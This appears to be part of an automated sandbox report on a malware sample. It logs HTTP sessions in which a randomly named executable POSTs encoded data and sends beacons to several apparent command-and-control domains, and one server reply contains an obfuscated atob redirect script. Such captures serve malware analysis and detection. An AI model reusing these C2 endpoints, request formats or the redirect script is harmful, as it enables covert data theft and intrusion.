                                              server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1557&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.8 | 49713 | 43.199.54.158 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:07.271908045 CET | 769 | OUT | POST /iodk/ HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.327531.buzz
                                              Referer: http://www.327531.buzz/iodk/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 206
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 75 6f 34 51 69 45 6e 68 59 75 32 49 69 79 53 33 59 47 69 2f 56 55 67 69 39 58 4e 66 6d 70 63 43 59 67 4e 32 67 4a 55 72 4f 54 35 4d 39 43 73 64 58 55 64 64 57 45 38 4f 54 74 44 35 38 43 76 41 2f 56 2b 32 6d 57 33 6b 75 6b 63 72 56 43 71 57 77 67 43 35 5a 6c 43 58 41 38 5a 4e 4f 57 6b 67 6b 6f 2f 51 34 54 63 58 66 62 61 44 61 32 46 47 38 4f 76 77 56 74 77 50 70 67 4b 46 2b 4a 69 51 2b 50 54 77 2f 4d 32 79 61 73 39 61 46 4b 37 74 2b 52 6a 4a 5a 45 6b 31 2b 66 55 33 4a 30 30 61 44 39 6f 4d 7a 33 54 69 57 39 6f 62 2f 76 7a 53 41 37 53 44 4d 76 61 65 4b 45 34 3d
                                              Data Ascii: avRhn=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZEk1+fU3J00aD9oMz3TiW9ob/vzSA7SDMvaeKE4=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.8 | 49714 | 43.199.54.158 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:10.060489893 CET | 789 | OUT | POST /iodk/ HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.327531.buzz
                                              Referer: http://www.327531.buzz/iodk/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 226
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 76 49 6f 51 78 56 6e 68 49 2b 32 50 6e 79 53 33 54 6d 69 37 56 55 38 69 39 57 35 50 6d 62 34 43 59 44 5a 32 76 6f 55 72 4a 54 35 4d 7a 69 73 63 54 55 64 4b 57 45 41 73 54 6f 37 35 38 43 72 41 2f 51 43 32 6d 6c 66 72 74 55 63 70 4f 53 71 51 2f 41 43 35 5a 6c 43 58 41 34 77 71 4f 57 63 67 6b 59 76 51 35 79 63 59 58 37 61 43 4e 47 46 47 34 4f 76 30 56 74 77 58 70 68 57 76 2b 50 6d 51 2b 4b 33 77 2b 5a 43 78 41 38 39 59 61 61 37 2b 34 53 2b 48 63 33 31 52 77 2b 51 31 48 6b 67 6d 50 72 5a 6d 70 56 62 6b 56 39 41 77 2f 73 62 6b 46 4d 50 72 57 4d 4b 75 55 54 73 70 66 71 66 39 4a 6e 61 4a 6f 4d 38 2b 39 55 4c 42 76 6f 65 6b
                                              Data Ascii: avRhn=Qkuu51bm+JJ2vIoQxVnhI+2PnyS3Tmi7VU8i9W5Pmb4CYDZ2voUrJT5MziscTUdKWEAsTo758CrA/QC2mlfrtUcpOSqQ/AC5ZlCXA4wqOWcgkYvQ5ycYX7aCNGFG4Ov0VtwXphWv+PmQ+K3w+ZCxA89Yaa7+4S+Hc31Rw+Q1HkgmPrZmpVbkV9Aw/sbkFMPrWMKuUTspfqf9JnaJoM8+9ULBvoek


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.8 | 49727 | 43.199.54.158 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:12.801029921 CET | 1806 | OUT | POST /iodk/ HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.327531.buzz
                                              Referer: http://www.327531.buzz/iodk/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 1242
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 76 49 6f 51 78 56 6e 68 49 2b 32 50 6e 79 53 33 54 6d 69 37 56 55 38 69 39 57 35 50 6d 62 77 43 62 7a 46 32 75 4c 4d 72 49 54 35 4d 74 79 73 5a 54 55 64 79 57 41 55 6f 54 6f 2b 4d 38 42 44 41 74 43 61 32 78 6b 66 72 32 6b 63 70 48 79 71 56 77 67 43 57 5a 6c 53 62 41 38 73 71 4f 57 63 67 6b 64 72 51 6f 6a 63 59 56 37 61 44 61 32 46 4b 38 4f 75 54 56 74 6f 48 70 68 53 56 2f 38 75 51 2f 71 6e 77 38 76 65 78 59 73 39 47 62 61 36 6a 34 53 79 4d 63 33 6f 6f 77 2b 6b 62 48 6d 41 6d 4c 4b 34 67 78 6c 4f 37 4b 37 4d 68 6e 37 33 59 4d 2f 76 48 65 63 75 43 58 42 41 66 58 74 4c 70 4a 45 75 6e 6e 72 74 70 38 41 37 6d 72 6f 72 4e 36 4d 6b 62 39 71 71 4c 53 4a 7a 6e 68 75 56 42 33 76 35 30 55 76 62 77 7a 57 51 4e 44 75 30 38 36 56 48 77 75 6a 68 75 30 7a 50 55 32 73 66 63 77 34 4c 4f 32 65 59 42 46 30 48 69 46 45 6c 30 2b 66 56 73 48 46 39 79 6e 53 31 48 34 6d 6d 6e 32 32 53 36 31 62 62 33 44 74 2b 42 35 5a 58 48 54 45 43 53 4b 47 50 2f 69 78 59 34 64 52 32 42 [TRUNCATED]
                                              Data Ascii: avRhn=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 [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.8 | 49744 | 43.199.54.158 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:15.354065895 CET | 511 | OUT | GET /iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDx HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.8 | 49906 | 154.88.22.107 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:41.773291111 CET | 766 | OUT | POST /63n1/ HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.cg19g5.pro
                                              Referer: http://www.cg19g5.pro/63n1/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 206
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 66 45 44 51 6d 44 2b 72 6e 57 53 41 66 67 30 50 64 68 64 2f 43 64 6f 37 55 7a 4b 48 4a 33 44 46 4a 38 41 2b 78 64 37 75 45 6d 4e 57 6b 55 74 4c 4b 32 7a 66 32 79 30 4b 75 4f 6b 4d 5a 43 73 61 2f 50 74 55 41 30 77 62 73 38 79 53 48 6d 67 4d 59 43 48 73 36 35 71 50 78 56 76 62 79 59 5a 67 34 45 70 78 7a 34 37 4f 37 79 2b 4c 2b 6d 77 61 4b 73 30 57 57 6b 65 70 32 76 49 71 2b 67 75 5a 4b 54 74 34 74 55 6b 6b 73 76 6c 48 43 56 7a 56 79 6a 77 4d 79 39 71 45 55 2b 2f 59 6a 30 6c 2f 5a 69 33 33 74 51 56 44 75 4f 79 31 4c 46 61 4c 77 2b 33 44 6c 2b 54 38 61 45 77 3d
                                              Data Ascii: avRhn=9ziv3/zvB1BtfEDQmD+rnWSAfg0Pdhd/Cdo7UzKHJ3DFJ8A+xd7uEmNWkUtLK2zf2y0KuOkMZCsa/PtUA0wbs8ySHmgMYCHs65qPxVvbyYZg4Epxz47O7y+L+mwaKs0WWkep2vIq+guZKTt4tUkksvlHCVzVyjwMy9qEU+/Yj0l/Zi33tQVDuOy1LFaLw+3Dl+T8aEw=
                                              Jan 11, 2025 05:22:42.651037931 CET | 364 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Encoding: gzip
                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 26 be 46 5e 19 3e b9 7e 79 be 21 39 85 91 c1 a6 e5 c9 b9 16 66 7e 59 91 95 fe 8e b6 b6 ea 9a 36 fa 50 13 01 42 55 a9 14 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>&F^>~y!9f~Y6PBUZ0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.8 | 49924 | 154.88.22.107 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:44.326875925 CET | 786 | OUT | POST /63n1/ HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.cg19g5.pro
                                              Referer: http://www.cg19g5.pro/63n1/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 226
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 65 6b 7a 51 6b 67 6d 72 6c 32 53 50 51 41 30 50 58 42 64 6a 43 64 73 37 55 78 6e 61 4b 43 54 46 4b 64 77 2b 77 59 62 75 48 6d 4e 57 73 30 74 4f 45 57 7a 41 32 31 39 31 75 4c 45 4d 5a 43 49 61 2f 4b 52 55 41 6e 49 63 74 73 79 51 50 47 67 4f 56 69 48 73 36 35 71 50 78 56 37 39 79 59 42 67 34 30 35 78 7a 5a 37 4e 7a 53 2b 55 39 6d 77 61 4f 73 30 53 57 6b 66 4d 32 75 6b 4d 2b 69 6d 5a 4b 54 64 34 74 68 45 6c 6d 76 6c 46 66 46 7a 4c 37 7a 51 46 37 76 53 6f 63 74 72 64 74 58 6c 53 63 55 47 64 33 79 64 46 74 4f 61 65 4c 47 79 39 31 4a 71 72 2f 64 44 4d 45 54 6d 73 45 58 4d 64 68 70 2b 35 4a 75 73 69 34 42 65 43 4c 78 4b 64
                                              Data Ascii: avRhn=9ziv3/zvB1BtekzQkgmrl2SPQA0PXBdjCds7UxnaKCTFKdw+wYbuHmNWs0tOEWzA2191uLEMZCIa/KRUAnIctsyQPGgOViHs65qPxV79yYBg405xzZ7NzS+U9mwaOs0SWkfM2ukM+imZKTd4thElmvlFfFzL7zQF7vSoctrdtXlScUGd3ydFtOaeLGy91Jqr/dDMETmsEXMdhp+5Jusi4BeCLxKd
                                              Jan 11, 2025 05:22:45.209973097 CET | 364 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Encoding: gzip
                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 26 be 46 5e 19 3e b9 7e 79 be 21 39 85 91 c1 a6 e5 c9 b9 16 66 7e 59 91 95 fe 8e b6 b6 ea 9a 36 fa 50 13 01 42 55 a9 14 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>&F^>~y!9f~Y6PBUZ0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.8 | 49937 | 154.88.22.107 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:46.874960899 CET | 1803 | OUT | POST /63n1/ HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.cg19g5.pro
                                              Referer: http://www.cg19g5.pro/63n1/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 1242
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 65 6b 7a 51 6b 67 6d 72 6c 32 53 50 51 41 30 50 58 42 64 6a 43 64 73 37 55 78 6e 61 4b 43 62 46 4b 72 6b 2b 78 35 62 75 4a 47 4e 57 7a 45 74 50 45 57 79 63 32 30 5a 78 75 4c 49 44 5a 41 41 61 74 59 4a 55 56 6d 49 63 6a 73 79 51 4e 47 67 4e 59 43 48 35 36 35 36 4c 78 56 72 39 79 59 42 67 34 32 78 78 31 49 37 4e 31 53 2b 4c 2b 6d 77 57 4b 73 31 48 57 6b 47 78 32 75 67 44 2b 53 47 5a 4a 33 78 34 76 79 73 6c 6b 50 6c 44 63 46 79 59 37 7a 64 64 37 76 65 43 63 73 76 33 74 58 74 53 65 56 72 4a 73 42 4e 4a 32 63 66 76 41 6b 79 66 37 34 53 38 30 74 37 55 48 77 48 4a 4b 43 68 39 6f 50 47 31 41 66 35 74 6d 45 66 53 46 46 66 50 44 65 47 30 69 72 6d 39 6b 6b 5a 4c 44 64 43 61 79 39 63 41 34 53 55 49 31 66 72 39 5a 65 7a 37 42 2f 70 4f 68 76 54 6a 76 77 31 72 45 61 66 4c 75 53 73 4a 30 51 79 75 62 35 45 31 4d 64 4f 31 61 2b 2b 65 52 57 61 4f 79 39 64 47 6f 44 74 6c 44 36 4e 53 2b 39 4c 6d 58 78 6f 43 74 4a 66 66 78 34 33 6a 62 79 48 79 56 38 6c 52 7a 6d 30 66 [TRUNCATED]
                                              Data Ascii: avRhn=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 [TRUNCATED]
                                              Jan 11, 2025 05:22:47.764566898 CET | 364 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Encoding: gzip
                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 26 be 46 5e 19 3e b9 7e 79 be 21 39 85 91 c1 a6 e5 c9 b9 16 66 7e 59 91 95 fe 8e b6 b6 ea 9a 36 fa 50 13 01 42 55 a9 14 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>&F^>~y!9f~Y6PBUZ0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.8 | 49955 | 154.88.22.107 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:49.415225983 CET | 510 | OUT | GET /63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA== HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Jan 11, 2025 05:22:50.301038027 CET | 332 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 34 4d 32 4a 68 4c 6d 4e 6e 4d 54 6c 71 59 53 35 77 63 6d 38 36 4e 6a 59 79 4f 41 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly84M2JhLmNnMTlqYS5wcm86NjYyOA=c=')</script>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.8 | 49988 | 154.23.184.95 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:56.061652899 CET | 763 | OUT | POST /ebw6/ HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hm35s.top
                                              Referer: http://www.hm35s.top/ebw6/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 206
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 54 77 5a 2f 6a 33 6b 6b 49 78 4b 41 36 6a 4c 45 36 38 78 72 70 39 4e 44 7a 4d 69 47 48 67 4c 75 2b 74 6a 78 71 46 54 41 73 2f 71 72 49 47 62 4a 6b 45 71 32 4a 50 33 74 48 2b 36 4e 35 70 4c 6d 68 6b 64 4c 31 4f 56 4a 72 48 58 4e 71 51 4d 50 6e 54 42 34 4d 51 51 6f 4c 30 46 42 67 57 38 53 4b 31 38 4b 4b 59 72 71 72 34 6d 30 35 53 57 6e 36 59 48 46 55 59 51 4d 77 37 38 2b 2b 67 44 47 55 42 34 51 52 4e 32 53 74 51 4c 6e 6d 66 50 61 66 4b 39 53 49 4e 6e 43 74 30 6d 67 66 4f 73 41 33 54 2f 68 58 63 4b 48 7a 4e 6c 70 61 7a 6d 2f 44 47 68 43 57 49 48 49 4c 34 3d
                                              Data Ascii: avRhn=t5itM9IXjlQHPTwZ/j3kkIxKA6jLE68xrp9NDzMiGHgLu+tjxqFTAs/qrIGbJkEq2JP3tH+6N5pLmhkdL1OVJrHXNqQMPnTB4MQQoL0FBgW8SK18KKYrqr4m05SWn6YHFUYQMw78++gDGUB4QRN2StQLnmfPafK9SINnCt0mgfOsA3T/hXcKHzNlpazm/DGhCWIHIL4=
                                              Jan 11, 2025 05:22:56.825022936 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.8 | 49989 | 154.23.184.95 | 80 | 5124 | C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:22:58.624088049 CET | 783 | OUT | POST /ebw6/ HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hm35s.top
                                              Referer: http://www.hm35s.top/ebw6/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 226
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 7a 41 5a 2b 41 76 6b 6d 6f 78 4a 50 61 6a 4c 4e 61 38 31 72 70 68 4e 44 79 5a 76 48 31 45 4c 67 38 31 6a 72 6f 74 54 4e 4d 2f 71 7a 34 47 65 47 45 45 68 32 4a 43 49 74 43 65 36 4e 34 4e 4c 6d 6a 38 64 4b 43 53 57 49 37 48 52 42 4b 51 4f 58 48 54 42 34 4d 51 51 6f 4c 78 65 42 68 79 38 52 37 46 38 4c 72 59 71 67 4c 34 6e 39 5a 53 57 31 4b 59 4c 46 55 59 49 4d 30 61 72 2b 38 59 44 47 55 52 34 52 41 4e 35 5a 74 51 46 6a 6d 65 71 61 73 36 77 49 36 70 77 47 2f 70 49 6a 2f 43 51 49 68 69 56 37 31 55 4d 45 7a 6c 4f 70 5a 62 51 36 30 62 4a 59 31 59 33 57 63 76 58 79 4d 50 48 74 70 44 73 41 78 4e 57 42 37 4e 47 6a 4d 70 59
